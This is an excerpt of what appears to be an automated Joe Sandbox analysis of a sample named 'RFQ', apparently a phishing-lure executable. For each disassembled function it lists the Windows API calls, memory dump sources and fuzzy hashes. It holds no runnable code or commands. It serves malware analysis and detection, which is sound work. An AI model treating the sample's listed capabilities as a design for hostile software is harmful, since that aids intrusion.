                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                            • String ID:
                                                                            • API String ID: 2387181109-0
                                                                            • Opcode ID: 23df950ae80b9dadf44f3d9c0b096c05e10168530543292ab651d84776f3f28a
                                                                            • Instruction ID: 4815c56fbf6824374ebafb50316866c28f21c4c8238981721a9d52b7e4c26074
                                                                            • Opcode Fuzzy Hash: 23df950ae80b9dadf44f3d9c0b096c05e10168530543292ab651d84776f3f28a
                                                                            • Instruction Fuzzy Hash: 2431BE72505315AFC720DF98C849B9ABBEAFF88314F004A19F589971D1CA35EA058B96
                                                                            Function 006E4BD3 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 006E4BEB
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 006E4C08
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 006E4C40
                                                                            • _wcslen.LIBCMT ref: 006E4C5E
                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 006E4C66
                                                                            • _wcsstr.LIBVCRUNTIME ref: 006E4C70
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                            • String ID:
                                                                            • API String ID: 72514467-0
                                                                            • Opcode ID: ff2dc397a8ac11839b65474a3a18dd7ba9e977c3f09f1a81cc9ed28af57c7b7d
                                                                            • Instruction ID: cf70a51e8eb9744bcc8eb1382a844911a955ab62f70ee5e90c38d93259d0e2ba
                                                                            • Opcode Fuzzy Hash: ff2dc397a8ac11839b65474a3a18dd7ba9e977c3f09f1a81cc9ed28af57c7b7d
                                                                            • Instruction Fuzzy Hash: 2D2129312063807AEB155B7ADC05EBB7BAEDF49B50F20807DF809CA191EE65DC4196A4
                                                                            Function 006F573C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068592D: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00685922,?,?,006848AA,?,?,?,00000000), ref: 0068594D
                                                                            • _wcslen.LIBCMT ref: 006F5799
                                                                            • CoInitialize.OLE32(00000000), ref: 006F58B3
                                                                            • CoCreateInstance.OLE32(0071FD14,00000000,00000001,0071FB84,?), ref: 006F58CC
                                                                            • CoUninitialize.OLE32 ref: 006F58EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                            • String ID: .lnk
                                                                            • API String ID: 3172280962-24824748
                                                                            • Opcode ID: d015204dc31581be9fdf3c583f86d08b1673c5efc063fff02ecd1822a8ae00ad
                                                                            • Instruction ID: 754e22d3bf708fa881925c2d0b39339c0ade7c2f0445c070bf24c583db6d77a2
                                                                            • Opcode Fuzzy Hash: d015204dc31581be9fdf3c583f86d08b1673c5efc063fff02ecd1822a8ae00ad
                                                                            • Instruction Fuzzy Hash: 22D175706047059FC714EF28C484A6ABBE6FF89714F14895CFA9A9B361CB31EC45CB92
                                                                            Function 00717B91 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00717BD5
                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00717BFA
                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00717C12
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00717C3B
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,006FB6CB,00000000), ref: 00717C5B
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00717C46
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 2294984445-0
                                                                            • Opcode ID: 877a2cedc1577285066cce125a4bb8c2485c531665592867bb750183b52a5227
                                                                            • Instruction ID: d06701cf59c8c88d86dfda039e32685ac82ae778416e4559d391bc20cad35c9e
                                                                            • Opcode Fuzzy Hash: 877a2cedc1577285066cce125a4bb8c2485c531665592867bb750183b52a5227
                                                                            • Instruction Fuzzy Hash: 3121A9712542419FDF285F7CCC48AEA37B9EB45325F248629F926D22E0D7389990CBA4
                                                                            Function 006E16A1 Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006E0EF8: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006E0F0E
                                                                              • Part of subcall function 006E0EF8: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006E0F1A
                                                                              • Part of subcall function 006E0EF8: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006E0F29
                                                                              • Part of subcall function 006E0EF8: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006E0F30
                                                                              • Part of subcall function 006E0EF8: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006E0F46
                                                                            • GetLengthSid.ADVAPI32(?,00000000,006E1279), ref: 006E16F2
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006E16FE
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 006E1705
                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 006E171E
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,006E1279), ref: 006E1732
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E1739
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 3008561057-0
                                                                            • Opcode ID: 58510213004396f4bb23293734081c1eb8321b585e40d25d9603f2d415cf1812
                                                                            • Instruction ID: 32fe8c4723126360745ea0cd8b5661895053d38216bae890a5e97bc9f0c11744
                                                                            • Opcode Fuzzy Hash: 58510213004396f4bb23293734081c1eb8321b585e40d25d9603f2d415cf1812
                                                                            • Instruction Fuzzy Hash: 2A11B1B2582304FFDF119FA9CC49BEE7BAAFB46355F148018E8829B250D7359D41EB60
                                                                            Function 006E1412 Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006E1443
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 006E144A
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 006E1459
                                                                            • CloseHandle.KERNEL32(00000004), ref: 006E1464
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006E1493
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 006E14A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            • Opcode ID: b46b7a37183be3cb32757297481303d437f3575c08534ead4a624a8235d93b02
                                                                            • Instruction ID: 8ca8c3010885a8274ba2e24d62dcdb2c15421f55ddee4264b2ab3d9e39e834c2
                                                                            • Opcode Fuzzy Hash: b46b7a37183be3cb32757297481303d437f3575c08534ead4a624a8235d93b02
                                                                            • Instruction Fuzzy Hash: 93112C72541249EBDF028F98ED49FDE7BA9EF09704F148015FA00A62A0C3758E61EB60
                                                                            Function 006A3312 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,006A3309,006A2F75), ref: 006A3320
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006A332E
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006A3347
                                                                            • SetLastError.KERNEL32(00000000,?,006A3309,006A2F75), ref: 006A3399
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 8297ae1d22f334022fb1c34dc786cbd652ffdfe897c8c58cb3b528600df3fd92
                                                                            • Instruction ID: 3440e24e6a94980f7b22b5c28bf2111092c41f007018200128e8848b4342d32c
                                                                            • Opcode Fuzzy Hash: 8297ae1d22f334022fb1c34dc786cbd652ffdfe897c8c58cb3b528600df3fd92
                                                                            • Instruction Fuzzy Hash: 8A01F73364D331AEAFA537B47C956A72796EB47775320822EF010853F0EF654D115A4C
                                                                            Function 006B2D04 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,006A4973,?,?,?,006A6502,?,?,?,?), ref: 006B2D08
                                                                            • _free.LIBCMT ref: 006B2D3B
                                                                            • _free.LIBCMT ref: 006B2D63
                                                                            • SetLastError.KERNEL32(00000000,?,?,?), ref: 006B2D70
                                                                            • SetLastError.KERNEL32(00000000,?,?,?), ref: 006B2D7C
                                                                            • _abort.LIBCMT ref: 006B2D82
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free$_abort
                                                                            • String ID:
                                                                            • API String ID: 3160817290-0
                                                                            • Opcode ID: ef1ad38aea9490eaa3f2bfe17ff46b3909a4618808c40146db7ebaaef2498c86
                                                                            • Instruction ID: 15b49a853ce59ef6fe7cb00032ce0804f676f60f59701d22650478bad4e1e7ed
                                                                            • Opcode Fuzzy Hash: ef1ad38aea9490eaa3f2bfe17ff46b3909a4618808c40146db7ebaaef2498c86
                                                                            • Instruction Fuzzy Hash: FBF023F564070326C2633738AC26ADA32DBAFC6761B20851CF524D13D5DF2888C34359
                                                                            Function 00718916 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069AABF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0069AB19
                                                                              • Part of subcall function 0069AABF: SelectObject.GDI32(?,00000000), ref: 0069AB28
                                                                              • Part of subcall function 0069AABF: BeginPath.GDI32(?), ref: 0069AB3F
                                                                              • Part of subcall function 0069AABF: SelectObject.GDI32(?,00000000), ref: 0069AB68
                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00718940
                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 00718954
                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00718962
                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 00718972
                                                                            • EndPath.GDI32(?), ref: 00718982
                                                                            • StrokePath.GDI32(?), ref: 00718992
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                            • String ID:
                                                                            • API String ID: 43455801-0
                                                                            • Opcode ID: 2f3949fcb09367ff23b6e3ca75a4d1bd58ef162dbc71c90d0a310b4d71e0c6be
                                                                            • Instruction ID: 3e1d9ee2e337151f8983fcc1eb5b010516842e0d6517ff7c77290286b773d600
                                                                            • Opcode Fuzzy Hash: 2f3949fcb09367ff23b6e3ca75a4d1bd58ef162dbc71c90d0a310b4d71e0c6be
                                                                            • Instruction Fuzzy Hash: 0E111B7604014CFFDF029F94DC88EEA7FADEB08351F04C011BA099A1A1D775AD55DBA4
                                                                            Function 006E5153 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 006E516E
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 006E517F
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006E5186
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 006E518E
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 006E51A5
                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 006E51B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            • Opcode ID: 8116cd507e6c531ed01d8b560f639934d0d90d55d10ef84cd66445ca7eb30f1c
                                                                            • Instruction ID: 5926c7b22cc34e58a3ac13a2c0ee89f91067d8c740300863b5eb4c92a162d322
                                                                            • Opcode Fuzzy Hash: 8116cd507e6c531ed01d8b560f639934d0d90d55d10ef84cd66445ca7eb30f1c
                                                                            • Instruction Fuzzy Hash: 21017175A80318BBEB119BEA9C49A9ABF79EB48751F008065EA05AB281D6709900CB94
                                                                            Function 006834CE Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006834FF
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00683507
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00683512
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0068351D
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00683525
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068352D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            • Opcode ID: e37f887b9bd4edbf5c4018132e2701ab1c7baf1df362c0b6cc283c6b908872a4
                                                                            • Instruction ID: 987e8bc580772fcd5b0f3daf1053374add1e05c21dd6d586d89d59b5cff9d54f
                                                                            • Opcode Fuzzy Hash: e37f887b9bd4edbf5c4018132e2701ab1c7baf1df362c0b6cc283c6b908872a4
                                                                            • Instruction Fuzzy Hash: 69016CB0942759BDE3008F5A8C85B52FFA8FF19354F00415B915C47941C7F5A864CBE5
                                                                            Function 006EEA3E Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 006EEA4E
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 006EEA64
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 006EEA73
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006EEA82
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006EEA8C
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 006EEA93
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            • Opcode ID: 959d21899b7781c5078e85effaf91eb1399b4888607084eb754dd46744208a66
                                                                            • Instruction ID: c89457cf9150ae9744dcce77ca78ef77b105414314d6e64519437e58153cbc2e
                                                                            • Opcode Fuzzy Hash: 959d21899b7781c5078e85effaf91eb1399b4888607084eb754dd46744208a66
                                                                            • Instruction Fuzzy Hash: 06F090B2180158BBE72217969C0EEEF3E7CEFCAB11F00C158F601D10D0D7A51A0186B9
                                                                            Function 006E17B8 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006E17C3
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 006E17CF
                                                                            • CloseHandle.KERNEL32(?), ref: 006E17D8
                                                                            • CloseHandle.KERNEL32(?), ref: 006E17E0
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 006E17E9
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E17F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: 5623c32cfa19faad01a3215d1521d1a1dd20c905762c3cef56e71cd79b998227
                                                                            • Instruction ID: 3f88dbc4b5fe4b2149eeae80d6f253b2cab7d94b993ba1135e7248fc2d5c124c
                                                                            • Opcode Fuzzy Hash: 5623c32cfa19faad01a3215d1521d1a1dd20c905762c3cef56e71cd79b998227
                                                                            • Instruction Fuzzy Hash: 98E0C976084119BBD7021BE9EC0D985BB39FB49721710C220F225810B0CB765420EB58
                                                                            Function 006EC4EE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00688FA0: _wcslen.LIBCMT ref: 00688FA5
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006EC60C
                                                                            • _wcslen.LIBCMT ref: 006EC653
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006EC6BA
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006EC6E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                            • String ID: 0
                                                                            • API String ID: 1227352736-4108050209
                                                                            • Opcode ID: 8022408bcc63aaf6f0f781b5170bfe7129f1bc304e001d76f88a3cee84e9dc7d
                                                                            • Instruction ID: b184dc5cd7e9bf1d8180a76cdbb4db1790fbec5554d53b7402c27d5100f6e323
                                                                            • Opcode Fuzzy Hash: 8022408bcc63aaf6f0f781b5170bfe7129f1bc304e001d76f88a3cee84e9dc7d
                                                                            • Instruction Fuzzy Hash: E85102716063809FD7509F2AC844BAB77EAAF85320F140A2DF895D72D0DBB0DD4A8B56
                                                                            Function 0070AC8B Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 0070ADCA
                                                                              • Part of subcall function 00688FA0: _wcslen.LIBCMT ref: 00688FA5
                                                                            • GetProcessId.KERNEL32(00000000), ref: 0070AE5F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0070AE8E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
